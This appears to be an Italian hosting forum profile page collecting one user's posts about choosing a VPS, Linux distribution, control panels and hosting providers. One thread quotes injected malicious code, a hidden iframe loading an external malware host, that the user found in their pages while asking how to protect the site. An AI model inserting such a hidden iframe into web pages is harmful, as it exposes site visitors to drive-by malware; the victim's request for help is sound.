Jump to content

grollaz

Members
  • Content Count

    11
  • Joined

  • Last visited

About grollaz

  • Rank
    Nuovo utente

Converted

  • Località
    Milano
  1. in realtà più che l'intero sistema pensavo ai vari domini e loro configurazioni, la macchina la reinstallerei da zero seguendo gli stessi passaggi fatti in locale..
  2. Alla fine dovendo imparare un po, prima di passare al reale server di produzione, sto approntando un server locale nel quale ho optato per: OS: Debian Lenny Pannello di configurazione: Webmin Pannello di configurazione siti: ISPConfig3 Vediamo se riuscirò a configurarlo e farlo funzionare.. Ora un'altra domanda, una volta messo in piedi e configurato totalmente il server locale, è possibile esportare le configurazioni per passarle poi sul server di produzione senza dover rifare tutto?
  3. ok, quindi tra i due è esattamente la stessa cosa, o uno è meglio dell'altro?
  4. Questa è una ottima considerazione, tra i vari loro mi hanno consigliato ISPConfig3 quindi credo che punterò su quello, mentre per l'OS tra Ubuntu10.04 e Debian5 quale è più facile e sicuro da gestire? Grazie.
  5. Ed anche questo c'è, nel senso che per il primo anno mi danno un servizio "fullmanaged" credo si chiami così, mentre dal secondo anno mi danno assistenza su richiesta, è per questo che cercavo di capire un po come addentrarmi in questo nuovo mondo, così da capire come funziona e poter poi rimanere indipendente salvo aggiornamenti e/o manutenzioni. In definitiva ciò che mi serve sapere è cosa utilizzare per gestire i domini nuovi e vecchi, tutto qui.
  6. Il mio provider attuale mi fa scegliere sia l'OS che il pannello di gestione, per il quale pensavo a Webmin/Usermin/Virtualmin oppure ISPConfig l'importante è che sia opensource e che mi permetta di gestire le funzioni essenziali del server e la creazione di vari domini con configurazione dei servizi associati, quindi email varie, ftp, database, ecc ecc.. Il tutto perchè sono nuovo del mondo server e non ho idea di come si possa fare il tutto da riga di comando o altro metodo. I domini da aggiungere poi al server sono tipo per ora una 50ina e gli indirizzi email tra tutti i domini saranno anche 200.. Specificato ciò, il consiglio qual'è?
  7. Ciao, sono nella situazione che mi porta ad acquistare un servizio di server virtuale per hostare i siti dei miei clienti (per ora circa 50), fin qui tutto apposto, il problema nasce ora nel dover scegliere la configurazione ideale ed i vari pannelli di controllo per la gestione, la domanda a questo punto è: Che OS Linux utilizzare? Che pannello utilizzare per la gestione del server? Che pannello utilizzare per creare i vari domini e servizi accessori? Grazie a tutti.
  8. grollaz

    Proteggersi da un code injection (credo)

    Forse risolto, ho analizzato e cercato il codice inserito, e leggo che è un virus nel pc che genera queste stringhe in vari casi.. su vari file, e poi quando li carichi online.. trac!! quindi grazie del supporto, ed ora lascio la palla a chi ha realizzato quella pagina. Buona serata a tutti.
  9. grollaz

    Proteggersi da un code injection (credo)

    Ciao, il codice inserito a fondo pagina per l'esattezza prima del tag di chiusura </body> era questo <iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe> Lo script del form è quello generato da un form generator trovato online. Detto questo, possono essere entrati dal form in qualche modo? O potrebbero aver trovato la password ftp? I file corrotti su varie centinaia erano solo 4.. Grazie.
  10. [Premessa: sperando di aver scelto il forum giusto e la sezione appropriata..] Ciao, settimana scorsa qualcuno mi ha inserito in alcune pagine html e php contenenti un form, un iframe con richiamo ad un codice malefico, come potersi proteggere? come può essere accaduto? Il servere è linux di aruba.. Grazie a tutti!!!
  11. grollaz

    Quale di questi 3 scegliere?

    Come mai non ti sei trovato bene?
  12. grollaz

    Quale di questi 3 scegliere?

    Grazie a tutti per i consigli e le vostre esperienze, se altri hanno altre esperienze, sono aperto a tutto. Mi raccomando solo ad una cosa, ricordate che tutta la scelta ruota soprattutto all'uptime. grazie.
  13. grollaz

    Quale di questi 3 scegliere?

    Nessuno che ha dati in riguardo?
  14. Ciao, sto cercando un hosting valido per trasferire i miei tutti i miei domini (circa 15 quelli dei clienti) ed ho la necessità che abbia un UpTme molto elevato "non dico 100% perchè so che è impossibile, ma li vicino.." in quanto è fondamentale la visibilità di questi domini, come il funzionamento continuo del server di posta. Requisiti: -Server Linux -Spazio intorno ai 2Gb. complessivi -MySql -Budget tra i 30 e i 100 euro a dominio, oppure intorno ai 400 euro per un piano multidominio (ripeto, fondamentale l'uptime) Dopo varie ricerche le mie attenzioni sono ricadute sui seguenti hosting: -Seeweb -Hostingperte -Hostinglab Ora dei 3 quale scegliere? Qualcuno li conosce? Esperienze positive/negative? In alternativa proponete qualcos'altro? Ciao a tutti.
×